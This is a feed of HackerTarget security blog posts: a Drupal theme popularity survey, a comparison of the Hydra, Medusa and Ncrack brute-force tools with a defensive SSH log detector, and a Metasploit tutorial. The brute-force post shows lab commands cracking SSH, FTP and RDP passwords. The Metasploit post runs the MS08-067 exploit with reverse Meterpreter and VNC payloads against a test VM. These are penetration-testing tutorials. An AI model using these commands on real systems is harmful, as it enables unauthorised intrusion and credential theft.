security – HackerTarget.com
https://hackertarget.com
Security Vulnerability Scanners and Assessments
Wed, 07 Dec 2022 00:19:57 +0000

30 most popular Drupal themes in Top 1M websites
https://hackertarget.com/30-most-popular-drupal-themes-in-top-1m-websites/
Fri, 07 Sep 2012 12:50:51 +0000

The post 30 most popular Drupal themes in Top 1M websites appeared first on HackerTarget.com.

In this list of popular Drupal Themes in the Alexa Top 1 million, I have tallied the number of Drupal themes based on the path of the theme installation.

Drupal theme counts were determined by analysing the HTML of the root pages in the top 1 million websites and extracting the default Drupal theme path (/all/themes/*/). Drupal installations using paths other than the one noted will not appear in this list.

Related analysis was performed of the Top WordPress Themes in the Alexa 1 million, and the infographic of the WordPress Top 100K websites.
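As an added example (not code from the original post), the tally described above can be reproduced in Python over a set of crawled root pages: it extracts theme names from the default /all/themes/<theme>/ path, counts each site once per theme, and deliberately misses core and custom theme locations, which is exactly the blind spot noted above. The sample pages are constructed.

```python
import re
from collections import Counter

# The survey keyed on the default contributed-theme path, /all/themes/<theme>/,
# as it appears in CSS, JS and image URLs of a site's root page. Core themes
# (/themes/bartik/) and non-default theme locations are NOT matched on purpose.
THEME_PATH_RE = re.compile(r'/all/themes/([A-Za-z0-9_-]+)/')


def themes_in_html(html):
    """Return the set of Drupal theme names referenced by one page's HTML."""
    return set(THEME_PATH_RE.findall(html))


def tally_themes(pages):
    """pages: iterable of (site, html). A site is counted at most once per
    theme even if its page references that theme path dozens of times; a site
    that references both a base theme and a sub-theme counts once for each."""
    counts = Counter()
    for _site, html in pages:
        for theme in themes_in_html(html):
            counts[theme] += 1
    return counts


def ranked(counts, top=30):
    """Rank by count descending, then by name, like the table below."""
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))[:top]


# Constructed sample pages standing in for crawled root pages (not real data).
SAMPLE_PAGES = [
    ("a.example", '<link rel="stylesheet" href="/sites/all/themes/zen/css/styles.css">'
                  '<script src="/sites/all/themes/zen/js/script.js"></script>'),
    ("b.example", '<link href="http://b.example/sites/all/themes/fusion/fusion_core/css/fusion-core.css">'),
    ("c.example", '<img src="/sites/all/themes/zen/logo.png">'          # base theme
                  '<link href="/sites/all/themes/custom/style.css">'),  # sub-theme
    ("d.example", '<link href="/themes/bartik/css/style.css">'),        # core theme path: missed
    ("e.example", '<p>not a Drupal site</p>'),
]

if __name__ == "__main__":
    for rank, (theme, n) in enumerate(ranked(tally_themes(SAMPLE_PAGES)), 1):
        print(f"{rank:>4}  {theme:<20} {n} sites")
```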

Table of the Top 30 Drupal Themes

Rank  Drupal Theme        Count in Top 1M
   1  zen                 569 sites
   2  fusion              303 sites
   3  custom              230 sites
   4  framework            90 sites
   5  basic                86 sites
   6  adaptivetheme        79 sites
   7  marinelli            75 sites
   8  omega                68 sites
   9  zeropoint            66 sites
  10  acquia_marina        62 sites
  11  sky                  60 sites
  12  danland              52 sites
  13  newsflash            49 sites
  14  pixture_reloaded     47 sites
  15  drigg_theme          45 sites
  16  newswire             42 sites
  17  openpublish_theme    39 sites
  18  mayo                 38 sites
  19  blueprint            38 sites
  20  acquia_prosper       38 sites
  21  cti_flex             34 sites
  22  waffles              31 sites
  23  corolla              31 sites
  24  genesis              29 sites
  25  contrib              29 sites
  26  analytic             28 sites
  27  corporateclean       26 sites
  28  yaml                 24 sites
  29  ninesixty            24 sites
  30  clean                24 sites

As this list is based on the default theme path, there will be themes and sites missed in this quick dump. However, it is still a good indication of the themes being used by the most popular Drupal installations in the world.

When I performed the analysis of the WordPress themes, it was very interesting to note the difference between the total download counts of themes compared with those that were in production use.


Malware in WordPress Themes
https://hackertarget.com/malware-in-wordpress-themes/
Wed, 01 Jun 2011 06:15:16 +0000

Found an interesting article over at OttoPress with some in-depth analysis of malware discovered in a theme on a less than reputable WordPress theme site. Seems there are some dodgy sites out there that have infected themes, both free ones and ripped-off professional themes. Beware and check the reputation of your themes.

It had malware inserted into it that is of a much more malicious and spammy nature. Further investigation reveals that ALL of the themes on that site contain basically the same code. This code is not actually “viral”, but it’s definitely malware and it’s worth investigating to see some of the ways people try to hide their spam.

So today, I’m going to dissect it and serve it up on a platter for everybody to see.

Anatomy of a theme malware

Other excellent posts on this topic include:
Jaypee writes on WordPress Theme Malware
Analysis of Top Google Results for Free WordPress Themes

Brute Forcing Passwords with ncrack, hydra and medusa
https://hackertarget.com/brute-forcing-passwords-with-ncrack-hydra-and-medusa/
Fri, 06 May 2011 04:18:08 +0000

The post Brute Forcing Passwords with ncrack, hydra and medusa appeared first on HackerTarget.com.

]]>
Ready to test a number of password brute-forcing tools? Passwords are often the weakest link in any system and are ultimately susceptible to brute-force attacks. Testing for weak passwords is an important part of security vulnerability assessments.

This article will focus on tools that allow remote service brute-forcing. These are typically Internet-facing services that are accessible from anywhere in the world. Another type of password brute-force attack is against the password hash itself: powerful tools such as Hashcat can crack password hashes on a local system.

The three tools assessed are Hydra, Medusa and Ncrack (from nmap.org).

Installation

Installation of all three tools was straightforward on Ubuntu Linux. Use the standard method to compile an application from source (unpack the tarball, then configure, make and install). Alternatively, the three tools come pre-packaged on Kali.

wget https://nmap.org/ncrack/dist/ncrack-0.7.tar.gz
tar xzf ncrack-0.7.tar.gz
cd ncrack-0.7
./configure
make
make install

wget https://github.com/vanhauser-thc/thc-hydra/archive/v9.0.tar.gz
tar xzf v9.0.tar.gz
cd thc-hydra-9.0
./configure
make
make install

wget http://www.foofus.net/jmk/tools/medusa-2.2.tar.gz
tar xzf medusa-2.2.tar.gz
cd medusa-2.2
./configure
make
make install

Password List

I grabbed a list of 500 passwords from skullsecurity.org. Of course, you can find password lists with many thousands or even millions of passwords. You will need to choose what is most appropriate for your password testing, since the target type and the rate of testing are major factors.

wget https://downloads.skullsecurity.org/passwords/500-worst-passwords.txt.bz2

bzip2 -d 500-worst-passwords.txt.bz2

Series of tests

The following tests were performed against a Linux Virtual Machine running on VirtualBox. Speed will vary depending on whether the target is local, the latency of the connection, and even the processing power of the target system. Heavy brute forcing can load a target's CPU, potentially causing a denial of service condition. Take care if testing production systems.

Test 1 - SSH

The first series of tests was against SSH. I set the root account with the password toor. I added toor to the end of the 500 password list at number 499.

~# hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-05 16:45:19
[DATA] 16 tasks, 1 servers, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 185.00 tries/min, 185 tries in 00:01h, 315 todo in 00:02h
[STATUS] 183.00 tries/min, 366 tries in 00:02h, 134 todo in 00:01h
[22][ssh] host: 10.10.10.10   login: root   password: toor
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-05 16:48:08

Successfully found the password with Hydra!

~# ncrack -p 22 --user root -P 500-worst-passwords.txt 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-05 16:50 EST
Stats: 0:00:18 elapsed; 0 services completed (1 total)
Rate: 0.09; Found: 0; About 6.80% done; ETC: 16:54 (0:04:07 remaining)
Stats: 0:01:46 elapsed; 0 services completed (1 total)
Rate: 3.77; Found: 0; About 78.40% done; ETC: 16:52 (0:00:29 remaining)

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: 'root' 'toor'

Ncrack done: 1 service scanned in 138.03 seconds.

Ncrack finished.

Successfully found the password with Ncrack!

# medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (2 of 500 complete)

<< --- SNIP --->>>

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: billy (498 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: toor (499 of 500 complete)
ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]

~ 1500 seconds

Success again with Medusa; however, it took over 10 times as long with the default settings of each tool.

Test 2 - Speed

Let's try and speed things up a bit.

Cranking up Medusa speed to use 5 concurrent logins fails with the following error:

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mustang (7 of 500 complete)
medusa: ath.c:193: _gcry_ath_mutex_lock: Assertion `*lock == ((ath_mutex_t) 0)' failed.
Aborted

Running Ncrack with a faster timing template (-T5) was a bit faster, but not by much.

ncrack -p ssh -u root -P 500-worst-passwords.txt -T5 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 09:04 EST

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: 'root' 'toor'

Ncrack done: 1 service scanned in 128.98 seconds.

Ncrack finished.

Is Hydra any faster? Here I added the option for 32 threads.

$ hydra -t 32 -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-06 12:44:03
[DATA] 32 tasks, 1 servers, 500 login tries (l:1/p:500), ~15 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 184.00 tries/min, 184 tries in 00:01h, 316 todo in 00:02h
[STATUS] 185.50 tries/min, 371 tries in 00:02h, 129 todo in 00:01h
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
[22][ssh] host: 10.10.10.10   login: root   password: toor
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-06 12:46:57

No change really. Perhaps the limiting factor for Hydra and Ncrack is the speed of response from the VirtualBox machine. Either way, it appears the default speed is pretty good for both tools.
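From the defender's side, the SSH runs above leave a very recognisable trail in the target's auth.log: hundreds of failed password logins from one source at roughly 185 tries/min, then a single accepted login. The following detector is an added example, not part of the original post or of any of the three tools; it parses OpenSSH auth.log lines, flags a source once it passes a failure threshold inside a sliding window, and raises a separate alert when an already-flagged source then succeeds. The log lines, thresholds and host names are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Syslog-style OpenSSH lines as written to auth.log (no year in the timestamp).
LINE_RE = re.compile(
    r'^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2})\s+(?P<time>\d\d:\d\d:\d\d)\s+\S+\s+'
    r'sshd\[\d+\]:\s+(?P<result>Failed|Accepted) password for (?:invalid user )?'
    r'(?P<user>\S+) from (?P<ip>\S+) port \d+'
)


def parse_line(line, year=2011):
    """Parse one auth.log line into a dict, or None if it is not a password
    login event. `year` is supplied by the caller because syslog omits it."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m['mon']} {int(m['day']):02d} {m['time']}",
                           "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(lines, threshold=20, window_s=60):
    """Sliding-window detector. A source IP is flagged once it accumulates
    `threshold` failed logins within `window_s` seconds; an accepted login from
    an already-flagged IP is raised separately, because that is the case that
    matters (Hydra above hit 'toor' on try 499 after ~2.5 minutes of failures).
    Returns a list of (timestamp, alert_type, ip, detail) tuples."""
    failures = defaultdict(deque)   # ip -> failure timestamps still inside the window
    flagged = set()
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        q = failures[ip]
        while q and (ts - q[0]).total_seconds() > window_s:   # expire old failures
            q.popleft()
        if ev["result"] == "Failed":
            q.append(ts)
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ts, "BRUTE_FORCE", ip,
                               f"{len(q)} failed logins within {window_s}s"))
        elif ip in flagged:
            alerts.append((ts, "SUCCESS_AFTER_BRUTE_FORCE", ip,
                           f"accepted password for {ev['user']}"))
    return alerts


def build_constructed_log(attacker="10.10.10.1", tries=499, per_min=185):
    """Constructed auth.log, not a real capture: one normal admin login, one
    stray probe from elsewhere, then a Hydra-like run at the rate seen above
    (185 tries/min) that ends with the 499th password being accepted."""
    start = datetime(2011, 5, 5, 16, 45, 19)

    def fmt(ts):
        return f"{ts:%b} {ts.day:2d} {ts:%H:%M:%S}"

    lines = [
        f"{fmt(start - timedelta(minutes=5))} testbox sshd[1201]: Accepted password for admin from 10.10.10.50 port 50001 ssh2",
        f"{fmt(start - timedelta(minutes=3))} testbox sshd[1230]: Failed password for invalid user oracle from 203.0.113.9 port 5555 ssh2",
    ]
    for i in range(tries):
        ts = start + timedelta(seconds=i * 60 / per_min)
        lines.append(f"{fmt(ts)} testbox sshd[{4000 + i}]: Failed password for root from {attacker} port {40000 + i} ssh2")
    ts = start + timedelta(seconds=tries * 60 / per_min)
    lines.append(f"{fmt(ts)} testbox sshd[9999]: Accepted password for root from {attacker} port 49999 ssh2")
    return lines


if __name__ == "__main__":
    for ts, kind, ip, detail in detect_bruteforce(build_constructed_log()):
        print(f"{ts:%Y-%m-%d %H:%M:%S}  {kind:<26} {ip:<15} {detail}")
```

At 16 parallel tasks the threshold is crossed within the first ten seconds of the run; the same detector fed real logs would also catch the Medusa run, just over a longer window.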

Test 3 - FTP server

Now to try hitting the FTP server on the same host (vsftpd).

ncrack -u test -P 500-worst-passwords.txt 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 12:53 EST
Stats: 0:00:40 elapsed; 0 services completed (1 total)
Rate: 5.94; Found: 0; About 47.20% done; ETC: 12:54 (0:00:45 remaining)
Stats: 0:00:59 elapsed; 0 services completed (1 total)
Rate: 6.93; Found: 0; About 88.00% done; ETC: 12:54 (0:00:08 remaining)

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 69.01 seconds.

Attempting to push it faster...

$ ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 12:55 EST
Stats: 0:00:03 elapsed; 0 services completed (1 total)
Rate: 0.00; Found: 0; About 0.00% done
Stats: 0:00:06 elapsed; 0 services completed (1 total)
Rate: 0.00; Found: 0; About 0.00% done

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 66.01 seconds.

Same result. Limiting factor is likely the VM.

$ hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ftp
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-06 13:07:43
[DATA] 16 tasks, 1 servers, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ftp on port 21

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

[STATUS] 219.00 tries/min, 219 tries in 00:01h, 281 todo in 00:02h
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
[STATUS] 233.06 tries/min, 470 tries in 00:02h, 30 todo in 00:01h
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-06 13:09:56

Oops, did we crash the FTP service?

Now testing with Medusa.

~$ medusa -u test -P 500-worst-passwords.txt -h 10.10.10.10 -M ftp
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: password (2 of 500 complete)
ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: 12345678 (3 of 500 complete)
ERROR: [ftp.mod] failed: medusaReceive returned no data. Server may have dropped connection due to lack of encryption. Enabling the EXPLICIT mode may help.
CRITICAL: Unknown ftp.mod module state -1

Medusa also appears to be struggling.

Let's go back and check again with Ncrack to ensure the service is still OK.

~$ ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 13:14 EST

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 62.99 seconds.

Ncrack finished.

ncrack for the win!

Ncrack also has the ability to brute force RDP accounts. Let's hit a Windows box with Microsoft Remote Desktop Protocol enabled.

$ ncrack -u administrator -P 500-worst-passwords.txt -p 3389 10.212.50.21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 13:26 EST
Stats: 0:02:18 elapsed; 0 services completed (1 total)
Rate: 0.02; Found: 0; About 3.40% done; ETC: 14:33 (1:05:21 remaining)
Stats: 0:15:07 elapsed; 0 services completed (1 total)
Rate: 0.20; Found: 0; About 13.80% done; ETC: 15:15 (1:34:25 remaining)
Stats: 0:22:19 elapsed; 0 services completed (1 total)
Rate: 0.02; Found: 0; About 19.40% done; ETC: 15:21 (1:32:43 remaining)
Stats: 0:24:46 elapsed; 0 services completed (1 total)

Discovered credentials for rdp on 10.212.50.21 3389/tcp:
10.212.50.21 3389/tcp rdp: 'administrator' 'toor'

Ncrack done: 1 service scanned in 6072 seconds.

Protocol support varies for the different tools:

Hydra - TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc, RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, Subversion/SVN, Firebird, LDAP2, Cisco AAA

Medusa - AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper, Web Form

Ncrack - RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, telnet

Conclusion

There is much more that could be tested for a more comprehensive review: other protocols, different targets, latency, and further tweaking of the scan speeds and threads.

While ncrack has limited protocol support compared to Hydra and Medusa, the only conclusion from this little test is that when it comes to speed, reliability, and the ability to hit RDP services, ncrack wins!

Note:
Problems noted above regarding Hydra have been addressed and after testing it can be confirmed these issues are no longer present.

CHANGELOG for 6.4
=================
* Update SIP module to extract and use external IP addr return from server error to bypass NAT
* Update SIP module to use SASL lib
* Update email modules to check clear mode when TLS mode failed
* Update Oracle Listener module to work with Oracle DB 9.2
* Update LDAP module to support Windows 2008 active directory simple auth
* Fix to the connection adaptation engine which would loose planned attempts
* Fix make script for CentOS, reported by ya0wei
* Print error when a service limits connections and few pairs have to be tested
* Improved Mysql module to only init/close when needed
* Added patch from the FreeBSD maintainers
* Module usage help does not need a target to be specified anymore
* configure script now honors /etc/ld.so.conf.d/ directory

Metasploit 3.4.0 on Ubuntu 10.04 a quick introduction
https://hackertarget.com/metasploit-3-4-0-on-ubuntu-10-04-a-quick-introduction/
Wed, 02 Jun 2010 05:56:47 +0000

Perhaps you have heard of Metasploit. It is a very powerful exploitation framework developed by HD Moore.

Solid growth has seen an early version that was a few exploits in a Perl-based wrapper turn into a Ruby-coded framework that is competing with Core Impact and Canvas in the pen-testing community.

Here is a quick and dirty introduction to running it on Ubuntu Linux 10.04. Of course it will run just as easily on Fedora Linux, Windows or whatever Operating System floats your boat.

Download the framework from https://www.metasploit.com/get-started

I chose the binary version for 64 bit Linux.

Ruby is not installed by default in Ubuntu so start off with:

apt-get install ruby
chmod +x framework-3.4.0-linux-x86_64.run
./framework-3.4.0-linux-x86_64.run
Verifying archive integrity... All good.
Uncompressing Metasploit Framework v3.4.0-release Installer (64-bit)........


                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888

Metasploit Framework v3.4.0 Release
    Report Bugs: msfdev@metasploit.com


Warning: A copy of Metasploit already exists at /opt/metasploit3
         continuing this installation will DELETE the previous  
         install, including all user-modified files.

Please enter 'yes' to continue or any other key to abort
Continue (yes/no) > yes

This installer will place Metasploit into the /opt/metasploit3 directory.
Continue (yes/no) > yes
Removing files from the previous installation...

Extracting the Metasploit operating environment...

Extracting the Metasploit Framework...

Installing links into /usr/local/bin...

Installation complete.

Would you like to automatically update Metasploit?
AutoUpdate? (yes/no) > yes


*** snip ***

Updated to revision 9390.

Launch the Metasploit console by running 'msfconsole'

Exiting the installer...
root@testbox:/home/testuser/Downloads# msfconsole

                                  _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|


       =[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 553 exploits - 264 auxiliary
+ -- --=[ 208 payloads - 23 encoders - 8 nops
       =[ svn r9390 updated today (2010.06.01)

msf > exit

We have a working Metasploit, hoorah for us.

Exploit

Let's do a quick exploit of a Windows XP SP2 test machine I have on my network. It is running in Sun VirtualBox using Host Only Networking, as we will see shortly.

I like to use the command line utility for msf (msfcli) as once you get used to the syntax it is easier and faster. However, if you prefer, go with msfconsole.

Running msfcli with no arguments will list all exploits, payloads and other modules.

#msfcli | grep 08_067
exploit/windows/smb/ms08_067_netapi

Let's hit my Windows box with exploit/windows/smb/ms08_067_netapi; it is stable and works very well.

#msfcli  exploit/windows/smb/ms08_067_netapi
[*] Please wait while we load the module tree...
Usage: /opt/metasploit3/msf3/msfcli   [mode]
========================================================================

    Mode           Description
    ----           -----------
    (H)elp         You're looking at it baby!
    (S)ummary      Show information about this module
    (O)ptions      Show available options for this module
    (A)dvanced     Show available advanced options for this module
    (I)DS Evasion  Show available ids evasion options for this module
    (P)ayloads     Show available payloads for this module
    (T)argets      Show available targets for this exploit module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module

#msfcli  exploit/windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Running the following will display all payloads that will work with ms08_067_netapi. I have selected two in the following examples: a reverse Meterpreter and a VNC reverse DLL injection.

#msfcli exploit/windows/smb/ms08_067_netapi P

My Windows box is 192.168.56.101 and my local Ubuntu system is 192.168.56.1.

# msfcli  exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=192.168.56.101 LHOST=192.168.56.1 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.56.1:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748032 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1050)

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] 	Possible countermeasure found avgemc.exe C:\Program Files\AVG\AVG9\avgemc.exe
[*] Getting Windows Built in Firewall configuration...
[*] 	
[*] 	Domain profile configuration:
[*] 	-------------------------------------------------------------------
[*] 	Operational mode                  = Enable
[*] 	Exception mode                    = Enable
[*] 	
[*] 	Standard profile configuration (current):
[*] 	-------------------------------------------------------------------
[*] 	Operational mode                  = Disable
[*] 	Exception mode                    = Enable
[*] 	
[*] 	Local Area Connection firewall configuration:
[*] 	-------------------------------------------------------------------
[*] 	Operational mode                  = Enable
[*] 	
[*] 	Local Area Connection 2 firewall configuration:
[*] 	-------------------------------------------------------------------
[*] 	Operational mode                  = Enable
[*] 	
[*] Checking DEP Support Policy...
meterpreter > run get_local_subnets
Local subnet: 10.0.2.0/255.255.255.0
Local subnet: 192.168.56.0/255.255.255.0
meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    bgkill        Kills a background meterpreter script
    bglist        Lists running background scripts
    bgrun         Executes a meterpreter script as a background thread
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the meterpreter session
    help          Help menu
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    migrate       Migrate the server to another process
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    run           Executes a meterpreter script
    use           Load a one or more meterpreter extensions
    write         Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      Get as many privileges as possible
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

meterpreter >  pwd
C:\WINDOWS\system32
meterpreter > cd ..
meterpreter > cd ..
meterpreter > pwd
C:\
meterpreter >  ls

Listing: C:\
============

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
40777/rwxrwxrwx   0          dir   2009-12-22 05:59:31 +1100  $AVG
100777/rwxrwxrwx  0          fil   2009-12-22 05:39:51 +1100  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   2009-12-22 05:39:51 +1100  CONFIG.SYS
40777/rwxrwxrwx   0          dir   2010-02-12 15:23:25 +1100  Documents and Settings
100444/r--r--r--  0          fil   2009-12-22 05:39:51 +1100  IO.SYS
40777/rwxrwxrwx   0          dir   2010-02-11 13:11:43 +1100  Inetpub
100444/r--r--r--  0          fil   2009-12-22 05:39:51 +1100  MSDOS.SYS
100555/r-xr-xr-x  47564      fil   2004-08-04 22:00:00 +1000  NTDETECT.COM
40555/r-xr-xr-x   0          dir   2010-04-08 15:57:51 +1000  Program Files
40777/rwxrwxrwx   0          dir   2010-04-09 13:14:56 +1000  RECYCLER
40777/rwxrwxrwx   0          dir   2009-12-22 05:43:08 +1100  System Volume Information
40777/rwxrwxrwx   0          dir   2010-04-09 13:18:19 +1000  WINDOWS
100666/rw-rw-rw-  211        fil   2009-12-22 05:35:20 +1100  boot.ini
100444/r--r--r--  250032     fil   2004-08-04 22:00:00 +1000  ntldr
100666/rw-rw-rw-  301989888  fil   2010-06-01 02:21:17 +1000  pagefile.sys

The power of the Meterpreter is really only limited by your imagination: keylogging, screen captures, adding accounts, dumping the hashes to be cracked offline...

A VNC injection

# msfcli  exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/vncinject/reverse_tcp RHOST=192.168.56.101 LHOST=192.168.56.1 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.56.1:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
